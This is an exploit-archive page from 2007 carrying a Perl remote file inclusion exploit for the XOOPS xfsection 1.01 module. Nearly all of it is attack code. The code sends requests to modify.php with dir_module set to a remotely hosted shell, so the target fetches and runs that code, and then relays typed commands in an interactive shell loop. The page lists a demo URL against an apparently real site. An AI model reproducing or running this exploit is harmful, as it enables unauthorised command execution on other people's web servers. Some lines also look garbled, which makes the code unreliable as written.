Home / exploits xoops101-rfi.txt
Posted on 02 July 2007
#!/usr/bin/perl sub header() { print q { ========================================================================= XOOPS modules xfsection 1.01 =>Remote File Inclusion Exploit Exploit Coded by fl0 fl0w flo_flow_supremacy[at]yahoo[dot]com PoC:http://site.com/modules/xfsection/modify.php?dir_module=evilShell? Demo:http://www.homu.net/modules/xfsection/modify.php?dir_module=SHELL? ========================================================================= } } sub routine() { header(); print q { ====================================================================================================== USAGE: perl exploit.pl <http://site.com/modules/xfsection/modify.php?dir_module=shell?&cmdvar=command> EXAMPLE: perl [localhost][path] exploit.pl http://site.com/ ====================================================================================================== }; exit(); } use LWP::UserAgent; $site=@ARGV[0]; $shells=@ARGV[1]; $shellcmd=@ARGV[2]; if($site!~/http:/// || $site!~/http:/// || !$shells) { routine() } header(); while() { print"[shell] $"; while(<STDIN>) { $cmd=$_; chomp($cmd); $sploit=LWP::UserAgent->new() or die; $requesting=HTTP::Request->new(GET=>$site.'/modules/xfsection/modify.php?dir_module='.$shells.'?&'.$shellcmd.'='.$cmd) or die" NOT CONNECTED "; $re=$sploit->request(requesting); $i=$re->content; $i=~tr/[ ]/[ê]/; if(!$cmd) { print "Enter a command "; $i=""; } elsif(i=~/failed to open:HTTP request failed!/ || $i=~/:cannot execute the command in <b>/ ) { print " Could NOT connect to cmd from host "; exit; } elsif($i=~/^<br./>.<b>WARNING/) { print " Invalid command "; }; if($i=~/(.+)<br./>.<b>WARNING.(.+)<br./>.<b>WARNING/) { $last=$1; $last=~tr/[&234;]/[ ]/; print " $last "; last; } else { print "[shell] $"; } } } last;
